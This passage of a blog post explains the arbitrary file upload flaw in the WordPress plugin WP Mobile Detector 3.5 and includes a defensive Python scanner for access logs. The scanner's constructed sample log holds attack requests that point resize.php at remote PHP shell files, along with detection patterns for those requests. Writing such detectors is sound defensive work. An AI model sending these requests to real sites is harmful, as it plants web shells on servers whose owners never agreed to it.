Demonstrating WordPress exploits: WP Mobile Detector 3.5

Several months ago a very popular WordPress plugin that helps you present a mobile-friendly version of your site was found to have a large security hole. The plugin had a bug that allowed anyone to upload and execute arbitrary files.

If you go to /wp-content/plugins/3.5/resize.php on a website with the unpatched plugin installed, the script reads a src query parameter and copies the file at that path into a directory in its cache. Because the PHP setting allow_url_fopen, which is on by default, lets a URL be used wherever a file path is expected, this opens the door to uploading an executable PHP file to the server. Exploiting that is trivial, as demonstrated in this BugReplay video.
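From the defender's side, the request pattern just described is easy to spot in web server access logs: a hit on resize.php whose src parameter is a URL rather than a local path, followed by a request for a PHP file inside the plugin's cache directory. The following scanner is an added example, not code from the original post or from the plugin; the log lines are constructed, use the plugin path exactly as the post gives it, and the field names (reason, src) are my own choices.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in Apache "combined" format (not real traffic).
# The plugin path /wp-content/plugins/3.5/ is the one given in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2016:12:00:01 +0000] "GET /wp-content/plugins/3.5/resize.php?src=http://198.51.100.5/x.php HTTP/1.1" 200 512 "-" "curl/7.47.0"
192.0.2.10 - - [10/Jun/2016:12:00:05 +0000] "GET /wp-content/plugins/3.5/resize.php?src=/wp-content/uploads/2016/06/hero.jpg HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2016:12:00:09 +0000] "GET /wp-content/plugins/3.5/cache/x.php HTTP/1.1" 200 100 "-" "curl/7.47.0"
198.51.100.20 - - [10/Jun/2016:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Jun/2016:12:02:00 +0000] "GET /wp-content/plugins/3.5/resize.php?src=ftp%3A%2F%2F198.51.100.5%2Fshell.php HTTP/1.1" 200 300 "-" "python-requests/2.9"
"""

# Client IP, timestamp, request line and status of one combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# URL schemes that PHP stream wrappers (allow_url_fopen and friends) will open as a "file".
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "phar", "compress.zlib"}

# File extensions the web server would hand to the PHP interpreter.
PHP_EXT_RE = re.compile(r"\.ph(p\d?|tml|ar)(\W|$)", re.IGNORECASE)


def classify_src(src: str) -> Optional[str]:
    """Label a resize.php src value, or return None if it looks like an ordinary image path."""
    decoded = unquote(src)  # parse_qs already decodes once; this catches double-encoded values
    scheme = urlsplit(decoded).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "remote-src"        # a URL instead of a local path: the upload vector from the post
    if ".." in decoded:
        return "path-traversal"    # trying to leave the directory the plugin expects
    if PHP_EXT_RE.search(decoded):
        return "php-src"           # copying PHP source into a web-served cache directory
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request in the given access-log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        path = parts.path
        if path.endswith("/resize.php"):
            for src in parse_qs(parts.query).get("src", []):
                label = classify_src(src)
                if label:
                    findings.append({"ip": m["ip"], "ts": m["ts"], "reason": label,
                                     "src": unquote(src), "status": m["status"]})
        elif "/cache/" in path and PHP_EXT_RE.search(path):
            # A PHP file being served from the cache directory means a planted file is executing.
            findings.append({"ip": m["ip"], "ts": m["ts"], "reason": "cache-php-execution",
                             "src": path, "status": m["status"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['src']} (HTTP {f['status']})")
```

Run against the sample, the scanner flags the two remote-URL requests and the later hit on the planted file in the cache directory, while the ordinary image resize from the uploads directory passes. A matching "cache-php-execution" finding after a "remote-src" finding from the same address is the strongest signal that the upload actually succeeded. Beyond updating or removing the plugin, turning off allow_url_fopen in php.ini removes the URL-as-file-path behaviour the post relies on, though other code on the site may depend on it.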

For a little bit of background, WordPress accounts for about 26% of websites on the internet. Plugins for WordPress are bundles of source code that add functionality to your blog or site. They are typically installed by uploading a zip file through the admin panel.

You are essentially relying on third-party programmer…